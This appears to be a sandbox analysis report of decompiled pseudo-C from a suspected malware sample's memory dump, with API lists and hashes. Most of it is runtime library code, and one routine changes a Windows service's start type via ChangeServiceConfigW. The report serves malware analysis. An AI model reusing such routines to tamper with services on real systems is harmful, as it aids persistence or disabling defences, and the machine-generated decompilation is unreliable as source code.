                    						_t129 = E004483BC(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                    					}
                    					_t147 = _t129;
                    					if(_t147 == 0) {
                    						goto L113;
                    					} else {
                    						_t175 = _t147 + _t147;
                    						_t165 = _t175 + 8;
                    						asm("sbb eax, eax");
                    						if((_t175 + 0x00000008 & _t129) == 0) {
                    							_t184 = 0;
                    							__eflags = 0;
                    							L18:
                    							_v28 = _t184;
                    							if(_t184 == 0) {
                    								L30:
                    								E0043585D(0);
                    								_t183 = _v32;
                    								while(1) {
                    									L113:
                    									_t172 =  *_t179 & 0x0000ffff;
                    									__eflags = _t172;
                    									if(_t172 == 0) {
                    										break;
                    									}
                    									__eflags =  *_t183;
                    									if( *_t183 == 0) {
                    										L28:
                    										L29:
                    										return E004349BB(_v8 ^ _t187);
                    									}
                    									_v32 = 0;
                    									_t152 = 0;
                    									__eflags = 0;
                    									_v28 = _t179;
                    									_t144 = _t179;
                    									_t94 = _t172 & 0x0000ffff;
                    									do {
                    										_t144 =  &(_t144[1]);
                    										_t152 = _t152 + 1;
                    										__eflags =  *_t144 - _t94;
                    									} while ( *_t144 == _t94);
                    									_t95 = _t172 & 0x0000ffff;
                    									_v28 = _t144;
                    									_t145 = _v44;
                    									__eflags = _t95 - 0x64;
                    									if(__eflags > 0) {
                    										_t96 = _t95 - 0x68;
                    										__eflags = _t96;
                    										if(_t96 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L110:
                    												_push(0x49);
                    												L111:
                    												_pop(_t97);
                    												_push(_v32);
                    												_push(_t145);
                    												_push(_t183);
                    												_push(_v40);
                    												_push(_v48);
                    												_push(_v52);
                    												_t98 = E0044632B(_t145, _t153, _t179);
                    												_t188 = _t188 + 0x1c;
                    												__eflags = _t98;
                    												if(_t98 == 0) {
                    													 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    													goto L29;
                    												}
                    												L112:
                    												_t179 = _v28;
                    												continue;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L110;
                    											}
                    											L108:
                    											_t154 = _v40;
                    											_t179 =  &(_t179[1]);
                    											 *( *_t154) = _t172;
                    											 *_t154 =  &(( *_t154)[1]);
                    											 *_t183 =  *_t183 - 1;
                    											continue;
                    										}
                    										_t102 = _t96 - 5;
                    										__eflags = _t102;
                    										if(_t102 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L105:
                    												_push(0x4d);
                    												goto L111;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L105;
                    											}
                    											goto L108;
                    										}
                    										_t103 = _t102 - 6;
                    										__eflags = _t103;
                    										if(_t103 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L100:
                    												_push(0x53);
                    												goto L111;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L100;
                    											}
                    											goto L108;
                    										}
                    										_t104 = _t103 - 1;
                    										__eflags = _t104;
                    										if(_t104 == 0) {
                    											_t105 = _v48;
                    											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                    											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                    												_t173 =  *(_t145 + 0x150);
                    											} else {
                    												_t173 =  *(_t145 + 0x14c);
                    											}
                    											__eflags = _t152 - 1;
                    											if(_t152 != 1) {
                    												L91:
                    												_t155 =  *_t173 & 0x0000ffff;
                    												__eflags = _t155;
                    												if(_t155 == 0) {
                    													goto L112;
                    												}
                    												_t146 = _v40;
                    												while(1) {
                    													__eflags =  *_t183;
                    													if( *_t183 <= 0) {
                    														goto L112;
                    													}
                    													_t173 =  &(_t173[1]);
                    													 *( *_t146) = _t155;
                    													 *_t146 =  &(( *_t146)[0]);
                    													 *_t183 =  *_t183 - 1;
                    													_t155 =  *_t173 & 0x0000ffff;
                    													__eflags = _t155;
                    													if(_t155 != 0) {
                    														continue;
                    													}
                    													goto L112;
                    												}
                    											} else {
                    												__eflags =  *_t183;
                    												if( *_t183 <= 0) {
                    													goto L91;
                    												}
                    												_t180 = _v40;
                    												 *((short*)( *_t180)) =  *_t173;
                    												 *_t180 =  *_t180 + 2;
                    												 *_t183 =  *_t183 - 1;
                    											}
                    											goto L112;
                    										}
                    										__eflags = _t104 != 5;
                    										if(_t104 != 5) {
                    											goto L108;
                    										}
                    										_t153 = _t152;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x79);
                    											goto L111;
                    										}
                    										_t153 = _t153;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x59);
                    										goto L111;
                    									}
                    									if(__eflags == 0) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L75:
                    											_push(0x64);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L75;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x61);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x41);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x27;
                    									if(_t95 == 0x27) {
                    										_t110 = _t152 & 0x80000001;
                    										__eflags = _t110;
                    										if(__eflags < 0) {
                    											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                    										}
                    										_t179 =  &(_t179[_t152]);
                    										if(__eflags == 0) {
                    											_t159 =  *_t179 & 0x0000ffff;
                    											__eflags = _t159;
                    											if(_t159 == 0) {
                    												goto L28;
                    											}
                    											_t174 = _v40;
                    											while(1) {
                    												__eflags =  *_t183;
                    												if( *_t183 == 0) {
                    													goto L113;
                    												}
                    												_t111 = 0x27;
                    												_t179 =  &(_t179[1]);
                    												__eflags = _t159 - _t111;
                    												if(_t159 == _t111) {
                    													goto L113;
                    												}
                    												 *( *_t174) = _t159;
                    												 *_t174 =  &(( *_t174)[0]);
                    												 *_t183 =  *_t183 - 1;
                    												_t159 =  *_t179 & 0x0000ffff;
                    												__eflags = _t159;
                    												if(_t159 != 0) {
                    													continue;
                    												}
                    												goto L113;
                    											}
                    										}
                    										continue;
                    									}
                    									__eflags = _t95 - 0x41;
                    									if(_t95 == 0x41) {
                    										L41:
                    										_t116 = E00453424(_t145, _t179, _t183, _t179, L"am/pm");
                    										__eflags = _t116;
                    										if(_t116 != 0) {
                    											_t117 = E00453424(_t145, _t179, _t183, _t179, L"a/p");
                    											_pop(_t153);
                    											__eflags = _t117;
                    											if(_t117 == 0) {
                    												_v28 =  &(_t179[3]);
                    											}
                    										} else {
                    											_t153 =  &(_t179[5]);
                    											_v28 =  &(_t179[5]);
                    										}
                    										_push(0x70);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x48;
                    									if(_t95 == 0x48) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L55:
                    											_push(0x48);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L55;
                    										}
                    										goto L108;
                    									}
                    									__eflags = _t95 - 0x4d;
                    									if(_t95 == 0x4d) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L50:
                    											_push(0x6d);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L50;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x62);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x42);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x61;
                    									if(_t95 != 0x61) {
                    										goto L108;
                    									}
                    									goto L41;
                    								}
                    								goto L28;
                    							}
                    							_t203 = _v33;
                    							if(_v33 == 0) {
                    								_t133 = E0044827A(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                    							} else {
                    								_t133 = E004483BC(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                    							}
                    							_t181 = _t184;
                    							_t177 = _t133 - 1;
                    							if(_t177 <= 0) {
                    								L27:
                    								E0043585D(_t184);
                    								goto L28;
                    							} else {
                    								_t148 = _v32;
                    								_t185 = _v40;
                    								while( *_t148 > 0) {
                    									_t135 =  *_t181;
                    									_t181 = _t181 + 2;
                    									 *( *_t185) = _t135;
                    									 *_t185 =  &(( *_t185)[0]);
                    									 *_t148 =  *_t148 - 1;
                    									_t177 = _t177 - 1;
                    									if(_t177 > 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t184 = _v28;
                    								goto L27;
                    							}
                    						}
                    						asm("sbb eax, eax");
                    						_t137 = _t129 & _t175 + 0x00000008;
                    						_t165 = _t175 + 8;
                    						if((_t129 & _t175 + 0x00000008) > 0x400) {
                    							__eflags = _t175 - _t165;
                    							asm("sbb eax, eax");
                    							_t186 = E00445B29(_t165, _t137 & _t165);
                    							_v28 = _t186;
                    							_pop(_t165);
                    							__eflags = _t186;
                    							if(__eflags == 0) {
                    								goto L30;
                    							}
                    							 *_t186 = 0xdddd;
                    							L14:
                    							_t184 = _t186 + 8;
                    							goto L18;
                    						}
                    						asm("sbb eax, eax");
                    						E00456BA0();
                    						_t186 = _t188;
                    						_v28 = _t186;
                    						if(_t186 == 0) {
                    							goto L30;
                    						}
                    						 *_t186 = 0xcccc;
                    						goto L14;
                    					}
                    				}
                    			}































































                    0x00446f61
                    0x00446f69
                    0x00446f70
                    0x00446f76
                    0x00446f79
                    0x00446f80
                    0x00446f83
                    0x00446f89
                    0x00446f8c
                    0x00446f90
                    0x00446f93
                    0x00446f97
                    0x00446f9a
                    0x00446fb1
                    0x00446f9c
                    0x00446f9f
                    0x00446fa9
                    0x00446fa1
                    0x00446fa1
                    0x00446fa1
                    0x00446f9f
                    0x00446fbe
                    0x00000000
                    0x00446fc4
                    0x00446fcd
                    0x00446fd4
                    0x00446fde
                    0x00446fe1
                    0x00446fe9
                    0x00446ff1
                    0x00446ff9
                    0x00447000
                    0x00447006
                    0x0044700d
                    0x0044700f
                    0x00447025
                    0x00447033
                    0x00447011
                    0x0044701e
                    0x0044701e
                    0x00447038
                    0x0044703c
                    0x00000000
                    0x00447042
                    0x00447042
                    0x00447045
                    0x0044704a
                    0x0044704e
                    0x004470a8
                    0x004470a8
                    0x004470aa
                    0x004470aa
                    0x004470af
                    0x0044712f
                    0x00447131
                    0x00447136
                    0x004473ad
                    0x004473ad
                    0x004473ad
                    0x004473b0
                    0x004473b3
                    0x00000000
                    0x00000000
                    0x0044713f
                    0x00447142
                    0x00447119
                    0x0044711b
                    0x0044712e
                    0x0044712e
                    0x00447144
                    0x00447148
                    0x00447148
                    0x0044714a
                    0x0044714d
                    0x0044714f
                    0x00447152
                    0x00447152
                    0x00447155
                    0x00447156
                    0x00447156
                    0x0044715b
                    0x0044715e
                    0x00447161
                    0x00447164
                    0x00447167
                    0x0044729c
                    0x0044729c
                    0x0044729f
                    0x0044736c
                    0x0044736c
                    0x0044736f
                    0x00447388
                    0x0044738c
                    0x0044738c
                    0x0044738e
                    0x0044738e
                    0x0044738f
                    0x00447392
                    0x00447393
                    0x00447394
                    0x00447397
                    0x0044739b
                    0x0044739e
                    0x004473a3
                    0x004473a6
                    0x004473a8
                    0x004473c3
                    0x00000000
                    0x004473c9
                    0x004473aa
                    0x004473aa
                    0x00000000
                    0x004473aa
                    0x00447371
                    0x00447371
                    0x00447374
                    0x00000000
                    0x00000000
                    0x00447376
                    0x00447376
                    0x00447379
                    0x0044737e
                    0x00447381
                    0x00447384
                    0x00000000
                    0x00447384
                    0x004472a5
                    0x004472a5
                    0x004472a8
                    0x00447358
                    0x00447358
                    0x0044735b
                    0x00447364
                    0x00447368
                    0x00447368
                    0x00000000
                    0x00447368
                    0x0044735d
                    0x0044735d
                    0x00447360
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447362
                    0x004472ae
                    0x004472ae
                    0x004472b1
                    0x00447344
                    0x00447344
                    0x00447347
                    0x00447350
                    0x00447354
                    0x00447354
                    0x00000000
                    0x00447354
                    0x00447349
                    0x00447349
                    0x0044734c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044734e
                    0x004472b7
                    0x004472b7
                    0x004472ba
                    0x004472e3
                    0x004472e6
                    0x004472ea
                    0x004472f4
                    0x004472ec
                    0x004472ec
                    0x004472ec
                    0x004472fa
                    0x004472fd
                    0x00447319
                    0x00447319
                    0x0044731c
                    0x0044731f
                    0x00000000
                    0x00000000
                    0x00447325
                    0x00447328
                    0x00447328
                    0x0044732b
                    0x00000000
                    0x00000000
                    0x0044732f
                    0x00447332
                    0x00447335
                    0x00447338
                    0x0044733a
                    0x0044733d
                    0x00447340
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447342
                    0x004472ff
                    0x004472ff
                    0x00447302
                    0x00000000
                    0x00000000
                    0x00447304
                    0x0044730c
                    0x0044730f
                    0x00447312
                    0x00447312
                    0x00000000
                    0x004472fd
                    0x004472bc
                    0x004472bf
                    0x00000000
                    0x00000000
                    0x004472c6
                    0x004472c6
                    0x004472c9
                    0x004472dc
                    0x00000000
                    0x004472dc
                    0x004472cc
                    0x004472cc
                    0x004472cf
                    0x00000000
                    0x00000000
                    0x004472d5
                    0x00000000
                    0x004472d5
                    0x0044716d
                    0x0044726b
                    0x0044726b
                    0x0044726e
                    0x00447291
                    0x00447295
                    0x00447295
                    0x00000000
                    0x00447295
                    0x00447270
                    0x00447270
                    0x00447273
                    0x00000000
                    0x00000000
                    0x00447275
                    0x00447275
                    0x00447278
                    0x0044728a
                    0x00000000
                    0x0044728a
                    0x0044727a
                    0x0044727a
                    0x0044727d
                    0x00000000
                    0x00000000
                    0x00447283
                    0x00000000
                    0x00447283
                    0x00447173
                    0x00447176
                    0x00447218
                    0x00447218
                    0x0044721d
                    0x00447223
                    0x00447223
                    0x00447224
                    0x00447227
                    0x0044722d
                    0x00447230
                    0x00447233
                    0x00000000
                    0x00000000
                    0x00447239
                    0x0044723c
                    0x0044723c
                    0x0044723f
                    0x00000000
                    0x00000000
                    0x00447247
                    0x00447248
                    0x0044724b
                    0x0044724e
                    0x00000000
                    0x00000000
                    0x00447256
                    0x00447259
                    0x0044725c
                    0x0044725e
                    0x00447261
                    0x00447264
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447266
                    0x0044723c
                    0x00000000
                    0x00447227
                    0x0044717c
                    0x0044717f
                    0x00447194
                    0x0044719a
                    0x004471a1
                    0x004471a3
                    0x004471fe
                    0x00447204
                    0x00447205
                    0x00447207
                    0x0044720c
                    0x0044720c
                    0x004471a5
                    0x004471a5
                    0x004471a8
                    0x004471a8
                    0x0044720f
                    0x00000000
                    0x0044720f
                    0x00447181
                    0x00447184
                    0x004471de
                    0x004471de
                    0x004471e1
                    0x004471ed
                    0x004471f1
                    0x004471f1
                    0x00000000
                    0x004471f1
                    0x004471e3
                    0x004471e3
                    0x004471e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004471e8
                    0x00447186
                    0x00447189
                    0x004471ad
                    0x004471ad
                    0x004471b0
                    0x004471d3
                    0x004471d7
                    0x004471d7
                    0x00000000
                    0x004471d7
                    0x004471b2
                    0x004471b2
                    0x004471b5
                    0x00000000
                    0x00000000
                    0x004471b7
                    0x004471b7
                    0x004471ba
                    0x004471cc
                    0x00000000
                    0x004471cc
                    0x004471bc
                    0x004471bc
                    0x004471bf
                    0x00000000
                    0x00000000
                    0x004471c5
                    0x00000000
                    0x004471c5
                    0x0044718b
                    0x0044718e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044718e
                    0x00000000
                    0x004473b9
                    0x004470b1
                    0x004470b8
                    0x004470e1
                    0x004470ba
                    0x004470c9
                    0x004470c9
                    0x004470e8
                    0x004470ea
                    0x004470ed
                    0x00447112
                    0x00447113
                    0x00000000
                    0x004470ef
                    0x004470ef
                    0x004470f2
                    0x004470f5
                    0x004470fc
                    0x004470ff
                    0x00447102
                    0x00447105
                    0x00447108
                    0x0044710a
                    0x0044710d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044710d
                    0x0044710f
                    0x00000000
                    0x0044710f
                    0x004470ed
                    0x00447055
                    0x00447057
                    0x00447059
                    0x00447061
                    0x00447086
                    0x00447088
                    0x00447092
                    0x00447094
                    0x00447097
                    0x00447098
                    0x0044709a
                    0x00000000
                    0x00000000
                    0x004470a0
                    0x00447081
                    0x00447081
                    0x00000000
                    0x00447081
                    0x00447065
                    0x00447069
                    0x0044706e
                    0x00447070
                    0x00447075
                    0x00000000
                    0x00000000
                    0x0044707b
                    0x00000000
                    0x0044707b
                    0x0044703c

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm
                    • API String ID: 2936374016-3206640213
                    • Opcode ID: 0570d620cb685b60c06a707e9b1c3b6e43d75988c4ecdb2ef97f1838eb364f54
                    • Instruction ID: d3f1a53e010ebc02df7a96dfc46e440153f2efc97dfa99aa931aa9727d8e0bb1
                    • Opcode Fuzzy Hash: 0570d620cb685b60c06a707e9b1c3b6e43d75988c4ecdb2ef97f1838eb364f54
                    • Instruction Fuzzy Hash: 34D1BD31918206DAEB249F68C855ABBB7B0FF05300F24415BED01AB355D37D9D83DB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00410C6A(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v24;
                    				void* __esi;
                    				intOrPtr _t40;
                    				void* _t48;
                    				intOrPtr* _t51;
                    
                    				E00434D15( &_v12, 0);
                    				_t48 =  *0x475b0c;
                    				_v8 = _t48;
                    				_t51 = E0040DF9B(_a4, E0040DECA(0x471140));
                    				if(_t51 != 0) {
                    					L5:
                    					E00434D6D( &_v12);
                    					return _t51;
                    				} else {
                    					if(_t48 == 0) {
                    						__eflags = E0040E0B2(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							E0040DD96( &_v24);
                    							E00438B36( &_v24, 0x46ddac);
                    							asm("int3");
                    							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                    							__eflags =  *0x475b00 -  *((intOrPtr*)(_t40 + 4));
                    							if( *0x475b00 >  *((intOrPtr*)(_t40 + 4))) {
                    								_push(_t51);
                    								E00433E04(0x475b00);
                    								__eflags =  *0x475b00 - 0xffffffff;
                    								if( *0x475b00 == 0xffffffff) {
                    									E00411011();
                    									E0043418E(__eflags, 0x457a7c);
                    									E00433DC5(0x475b00, 0x475b00);
                    								}
                    							}
                    							return 0x475b04;
                    						} else {
                    							_t51 = _v8;
                    							 *0x475b0c = _t51;
                    							 *((intOrPtr*)( *_t51 + 4))();
                    							E00434F26(__eflags, _t51);
                    							goto L5;
                    						}
                    					} else {
                    						_t51 = _t48;
                    						goto L5;
                    					}
                    				}
                    			}










                    0x00410c77
                    0x00410c7c
                    0x00410c87
                    0x00410c98
                    0x00410c9c
                    0x00410cd0
                    0x00410cd3
                    0x00410cdf
                    0x00410c9e
                    0x00410ca0
                    0x00410cb4
                    0x00410cb7
                    0x00410ce3
                    0x00410cf1
                    0x00410cf6
                    0x00410cfd
                    0x00410d04
                    0x00410d0a
                    0x00410d0c
                    0x00410d13
                    0x00410d18
                    0x00410d20
                    0x00410d22
                    0x00410d2c
                    0x00410d32
                    0x00410d38
                    0x00410d39
                    0x00410d3f
                    0x00410cb9
                    0x00410cb9
                    0x00410cbe
                    0x00410cc6
                    0x00410cca
                    0x00000000
                    0x00410ccf
                    0x00410ca2
                    0x00410ca2
                    0x00000000
                    0x00410ca2
                    0x00410ca0

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410C77
                    • int.LIBCPMT ref: 00410C8A
                      • Part of subcall function 0040DECA: std::_Lockit::_Lockit.LIBCPMT ref: 0040DEDB
                      • Part of subcall function 0040DECA: std::_Lockit::~_Lockit.LIBCPMT ref: 0040DEF5
                    • std::_Facet_Register.LIBCPMT ref: 00410CCA
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410CD3
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410CF1
                    • __Init_thread_footer.LIBCMT ref: 00410D32
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID:
                    • API String ID: 3815856325-0
                    • Opcode ID: c5148572a028aad80f8660182b3c4f4fd887b29d01bf786c3309bbb2bf5e2956
                    • Instruction ID: 0e24d9df1cc023df3161bf333687b06628e6bb72bdddf0dcf17e55c19db5d516
                    • Opcode Fuzzy Hash: c5148572a028aad80f8660182b3c4f4fd887b29d01bf786c3309bbb2bf5e2956
                    • Instruction Fuzzy Hash: 312107319005149BC714EBA9D8019EDB3689F48324F20452FF409AB2D1EBBCBD81CBDD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0041A70D(signed char __ecx, char _a4) {
                    				signed char _v5;
                    				void* _t7;
                    				signed int _t11;
                    				void* _t17;
                    				short* _t21;
                    				signed int _t24;
                    				int _t25;
                    				void* _t28;
                    				void* _t31;
                    
                    				_push(__ecx);
                    				_t21 = 0;
                    				_v5 = __ecx;
                    				_t7 = OpenSCManagerW(0, 0, 2);
                    				_t24 =  &_a4;
                    				_t31 = _t7;
                    				_t28 = OpenServiceW(_t31, E00401F04(_t24), 2);
                    				if(_t28 != 0) {
                    					_t25 = _t24 | 0xffffffff;
                    					_t11 = _v5 & 0x000000ff;
                    					if(_t11 == 0) {
                    						_push(4);
                    						goto L8;
                    					} else {
                    						_t17 = _t11 - 1;
                    						if(_t17 == 0) {
                    							_push(2);
                    							goto L8;
                    						} else {
                    							if(_t17 == 1) {
                    								_push(3);
                    								L8:
                    								_pop(_t25);
                    							}
                    						}
                    					}
                    					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                    					CloseServiceHandle(_t31);
                    					CloseServiceHandle(_t28);
                    				} else {
                    					CloseServiceHandle(_t31);
                    				}
                    				E00401F09();
                    				return _t21;
                    			}












                    0x0041a710
                    0x0041a716
                    0x0041a718
                    0x0041a71d
                    0x0041a725
                    0x0041a728
                    0x0041a737
                    0x0041a73b
                    0x0041a74a
                    0x0041a74d
                    0x0041a74f
                    0x0041a763
                    0x00000000
                    0x0041a751
                    0x0041a751
                    0x0041a754
                    0x0041a75f
                    0x00000000
                    0x0041a756
                    0x0041a759
                    0x0041a75b
                    0x0041a765
                    0x0041a765
                    0x0041a765
                    0x0041a759
                    0x0041a754
                    0x0041a782
                    0x0041a785
                    0x0041a788
                    0x0041a73d
                    0x0041a73e
                    0x0041a73e
                    0x0041a78d
                    0x0041a79a

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00419E23,00000000), ref: 0041A71D
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00419E23,00000000), ref: 0041A731
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00419E23,00000000), ref: 0041A73E
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00419E23,00000000), ref: 0041A773
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00419E23,00000000), ref: 0041A785
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00419E23,00000000), ref: 0041A788
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    • API String ID: 493672254-0
                    • Opcode ID: e7878063e5caaaca61a8cedbbac54c5ed6fb17a278069e1d0bc7b087fef20cc5
                    • Instruction ID: d9da081a5df28a3f47245d7d92e327fff6fba86c73aa10446265f3ff81480433
                    • Opcode Fuzzy Hash: e7878063e5caaaca61a8cedbbac54c5ed6fb17a278069e1d0bc7b087fef20cc5
                    • Instruction Fuzzy Hash: D00149311462147AE6112B349C8EFBB3B7CDB01771F14032BF635A21D1EE68CF4595AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00447C05(void* __ebx, void* __ecx, void* __edx) {
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t3;
                    				void* _t4;
                    				intOrPtr _t9;
                    				void* _t11;
                    				void* _t20;
                    				void* _t21;
                    				void* _t23;
                    				void* _t25;
                    				void* _t27;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				long _t36;
                    				long _t37;
                    				void* _t40;
                    
                    				_t29 = __edx;
                    				_t23 = __ecx;
                    				_t20 = __ebx;
                    				_t36 = GetLastError();
                    				_t2 =  *0x4701dc; // 0x9
                    				_t42 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t3 = E004454E5(_t23, 1, 0x364);
                    					_t31 = _t3;
                    					_pop(_t25);
                    					if(_t31 != 0) {
                    						_t4 = E00448221(_t25, _t36, __eflags,  *0x4701dc, _t31);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E00447A77(_t25, _t31, 0x471664);
                    							E00446172(0);
                    							_t40 = _t40 + 0xc;
                    							__eflags = _t31;
                    							if(_t31 == 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t31);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t3);
                    						L4:
                    						E00446172();
                    						_pop(_t25);
                    						L9:
                    						SetLastError(_t36);
                    						E00445AE6(_t20, _t29, _t31, _t36);
                    						asm("int3");
                    						_push(_t20);
                    						_push(_t36);
                    						_push(_t31);
                    						_t37 = GetLastError();
                    						_t21 = 0;
                    						_t9 =  *0x4701dc; // 0x9
                    						_t45 = _t9 - 0xffffffff;
                    						if(_t9 == 0xffffffff) {
                    							L12:
                    							_t32 = E004454E5(_t25, 1, 0x364);
                    							_pop(_t27);
                    							if(_t32 != 0) {
                    								_t11 = E00448221(_t27, _t37, __eflags,  *0x4701dc, _t32);
                    								__eflags = _t11;
                    								if(_t11 != 0) {
                    									E00447A77(_t27, _t32, 0x471664);
                    									E00446172(_t21);
                    									__eflags = _t32;
                    									if(_t32 != 0) {
                    										goto L19;
                    									} else {
                    										goto L18;
                    									}
                    								} else {
                    									_push(_t32);
                    									goto L14;
                    								}
                    							} else {
                    								_push(_t21);
                    								L14:
                    								E00446172();
                    								L18:
                    								SetLastError(_t37);
                    							}
                    						} else {
                    							_t32 = E004481CB(_t25, _t37, _t45, _t9);
                    							if(_t32 != 0) {
                    								L19:
                    								SetLastError(_t37);
                    								_t21 = _t32;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						return _t21;
                    					}
                    				} else {
                    					_t31 = E004481CB(_t23, _t36, _t42, _t2);
                    					if(_t31 != 0) {
                    						L8:
                    						SetLastError(_t36);
                    						return _t31;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}





















                    0x00447c05
                    0x00447c05
                    0x00447c05
                    0x00447c0f
                    0x00447c11
                    0x00447c16
                    0x00447c19
                    0x00447c27
                    0x00447c2e
                    0x00447c33
                    0x00447c36
                    0x00447c39
                    0x00447c4b
                    0x00447c50
                    0x00447c52
                    0x00447c5d
                    0x00447c64
                    0x00447c69
                    0x00447c6c
                    0x00447c6e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447c54
